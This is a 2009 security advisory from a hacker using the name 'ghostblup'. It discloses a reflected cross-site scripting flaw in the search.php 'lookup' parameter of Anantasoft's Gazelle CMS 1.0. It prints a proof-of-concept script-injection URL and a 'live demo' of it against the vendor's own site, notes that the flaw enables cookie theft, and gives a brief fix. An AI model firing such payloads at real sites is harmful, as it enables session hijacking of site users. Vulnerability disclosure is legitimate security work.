____________________ / /******ghostblup********\ \ / / i love you Indonesia \ \ / / i love you ratih \ \ / / i love you full \ \ --------------------- -------------------------- ============================================ ---------------------------------------------------------------------------------------- --------------------------------------------------------------------------------- [ghostblup|adv02] Anantasoft's Gazelle CMS 1.0 --------------------------------------------------------------------------------- Author : ghostblup Date : September, 3 th 2009 Location : Palembang, Indonesia my blog : http://www.ghostblup.blogspot.com Impact : Exposure of sensitive information --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Anantasoft's Gazelle CMS version : <= 1.0 Vendor : http://www.anantasoft.com/ Download : http://sourceforge.net/projects/ananta/ License : GNU General Public License (GPL) -------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~ Critical Cross-site scripting (XSS). search.php is not in the filter that allows XSS / session/cookies stolen Poc/Exploit: ~~~~~~~ http://www.example.com.my/[path]/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E Demo Live: ~~~~~~~ http://www.anantasoft.com/search.php?lookup=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E Dork: ~~~ Google : N/A Solution: ~~~~~ - Edit the source code to ensure that input is properly verified. --------------------------------------------------------------------------- Shoutz: ~~~~~ ~ My Love : Ratih Permata Sari ~ My friends : Amy,suset,revi,uwix^_^, Blackgirl , jasakreativkomputer, cyberlau, Vldaz, _persona ~ My inspiration : K-159 , y3dips,az001,Hero ~ ngetem community, sayap community , echo.or.id , PalComTech.com ~ #ngetem #mr_green #sayap #kegelapan @irc.allnetwork --------------------------------------------------------------------------- Contact: ~~~~~~ ghostblup@gmail.com My Blog: http://www.ghostblup.blogspot.com ~~~~~~~~~~~~~~~~~~~~~end~~~~~~~~~~~~~~